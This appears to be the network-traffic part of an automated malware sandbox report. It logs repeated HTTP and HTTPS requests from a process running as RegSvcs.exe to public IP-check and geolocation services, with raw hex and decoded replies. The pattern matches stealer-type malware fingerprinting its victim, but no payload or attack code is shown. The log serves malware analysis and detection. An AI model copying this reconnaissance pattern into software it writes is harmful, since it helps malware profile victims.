                                                                                                                      Jan 11, 2025 06:49:30.747334957 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 11, 2025 06:49:31.382316113 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:31 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      12192.168.2.949928193.122.6.168807824C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 11, 2025 06:49:32.022583008 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 11, 2025 06:49:32.663877010 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:32 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      13192.168.2.949938193.122.6.168807824C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 11, 2025 06:49:33.271677017 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 11, 2025 06:49:33.916858912 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:33 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      14192.168.2.949948193.122.6.168807824C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 11, 2025 06:49:34.541174889 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 11, 2025 06:49:35.203424931 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:35 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      15192.168.2.949957193.122.6.168807824C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 11, 2025 06:49:35.814078093 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 11, 2025 06:49:36.440383911 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:36 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      HTTPS Proxied Packets

                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.949770104.21.32.14437496C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-11 05:49:11 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2025-01-11 05:49:11 UTC859INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:11 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1889340
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YO%2BJYN80FSF19UGQTxTWI30l8VLFipUUT1U9WnJcfOtMLe%2BGM43HABDG7xwpWjVcdMU%2BJ%2Fy6KZsPhh1GQq%2FyoOqM6QOf1AEnbiIYDOxsLrtMKyX3mtHSU4IUSjAoHpB9keAvGzmN"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 90029f43ca261875-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1547&min_rtt=1538&rtt_var=595&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1809169&cwnd=153&unsent_bytes=0&cid=daccf7a83e7ccd2f&ts=190&x=0"
                                                                                                                      2025-01-11 05:49:11 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      1192.168.2.949776104.21.32.14437496C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-11 05:49:12 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      2025-01-11 05:49:12 UTC859INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:12 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1889341
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jOEWM8hJbVQHslM%2BaP0YXAGWfd%2Bs%2BgazuMOAwEvwI24uTE%2FzpY98frnnH8f0hoO5zJsj2YupugeXS1S6ghvEHFZrIKZp6b%2F9hLcbwu91LicqVpabUkkr76daUdvsa1gnMIJy2yy2"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 90029f48dc81c327-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1645&min_rtt=1639&rtt_var=626&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1730883&cwnd=189&unsent_bytes=0&cid=f71c0d4866db918a&ts=140&x=0"
                                                                                                                      2025-01-11 05:49:12 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      2192.168.2.949788104.21.32.14437496C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-11 05:49:13 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      2025-01-11 05:49:13 UTC861INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:13 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1889342
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aO%2BcoyfoOJwTNwYq3tNu2jvyGsv%2FCdw8ZfQqV56crk5EZVX2APYedd%2FYus1KtxokHNOVdrHfppF8i31gvWAXA9K73aAy7Hjgvy6OC8CKm%2BtGgTbnbZUcj%2BDiqE8qcMLbHj7%2Bx3em"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 90029f50a990c327-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1597&min_rtt=1589&rtt_var=612&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1766485&cwnd=189&unsent_bytes=0&cid=c851a7d2e178a6fb&ts=134&x=0"
                                                                                                                      2025-01-11 05:49:13 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      3192.168.2.949796104.21.32.14437496C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-11 05:49:14 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      2025-01-11 05:49:15 UTC859INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:14 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1889344
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0p%2FYFODNxxLaXEXgPqXcXrk8t3Niu%2F3O2C%2B2l8d81NDy6peoq28%2FTwEcqQDfkMidWYmGDbdf33sdTjGaQ94jX7nY2CzllkAHuKvgMDnfDipSqUtIjOjOH4nQU9ddU7vvhGD%2F4zIo"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 90029f587a1d41a6-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1570&min_rtt=1559&rtt_var=607&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1768625&cwnd=241&unsent_bytes=0&cid=ce2977582c022089&ts=152&x=0"
                                                                                                                      2025-01-11 05:49:15 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      4192.168.2.949807104.21.32.14437496C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-11 05:49:16 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2025-01-11 05:49:16 UTC859INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:16 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1889345
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lIfiJBSn7XNF4kmh1yZBSamiKWqmSY8rHOs8Ewq4sL0FLgG1hvptCU%2BHCAdn%2F%2Bn%2FkI4Fr0dvBBrrcN98EVDimT1DimJUwLGtU6ckNwvkTNMi5lkGGLviQuJQ%2Ba2bDlgI6dPe4LTw"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 90029f606ace8cda-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1805&min_rtt=1803&rtt_var=680&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1604395&cwnd=243&unsent_bytes=0&cid=0b58d2b63d2c1f93&ts=141&x=0"
                                                                                                                      2025-01-11 05:49:16 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      5192.168.2.949815104.21.32.14437496C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-11 05:49:17 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      2025-01-11 05:49:17 UTC864INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:17 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1889346
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sf9ZakFtNmede5hAWndJGro6x%2B%2BfoYA4kaX5fXrnXVDZcLNKgRTJcC%2FVdl6d%2BKd5iqsTtbB1WV7jDeGk1ar%2BP7bJn9NXsb9ZQ23TkOtPKf%2FQl1Q%2FErmWT2eb4J7E3a1%2ByxgakBAC"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 90029f687bda4344-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1644&min_rtt=1640&rtt_var=623&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1746411&cwnd=47&unsent_bytes=0&cid=de104d878b1d310a&ts=155&x=0"
                                                                                                                      2025-01-11 05:49:17 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      6192.168.2.949826104.21.32.14437496C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-11 05:49:18 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      2025-01-11 05:49:18 UTC859INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:18 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1889347
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4vPrUIZtrxRXzkR6dH7CZi8kqiT%2BhHViqmMGTKVI9uxQGJeTodva%2B6LxvJO6etj63M8b5I4v%2Flxln7A75CZcs46BDX4ODRay%2FbKqjjLpUC3DPOGAnzFgptlSOVq8vaYz631s%2FOjl"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 90029f70697541a6-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1560&min_rtt=1554&rtt_var=587&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1879021&cwnd=241&unsent_bytes=0&cid=e7c261f0184f6b3a&ts=153&x=0"
